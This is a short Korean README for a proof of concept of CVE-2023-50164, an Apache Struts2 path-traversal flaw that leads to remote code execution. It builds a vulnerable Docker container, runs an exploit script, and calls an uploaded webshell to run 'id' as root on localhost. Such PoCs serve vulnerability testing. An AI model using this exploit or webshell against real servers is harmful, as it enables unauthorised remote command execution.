
CVE-2023-50164 (Apache Struts 경로 탐색을 통한 RCE 취약점) - 개념 증명
이 PoC는 Apache Struts2 취약점을 악용하여 RCE(원격 코드 실행)를 테스트하기 위해 제작되었습니다.

이미지를 빌드하고 컨테이너를 실행합니다:
$ DOCKER_BUILDKIT=1 docker build . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc
익스플로잇을 실행합니다:
$ cd exploit
$ ./exploit.sh
이제 아래와 같이 서버 측에서 임의의 명령을 실행할 수 있습니다:
$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a
uid=0(root) gid=0(root) groups=0(root)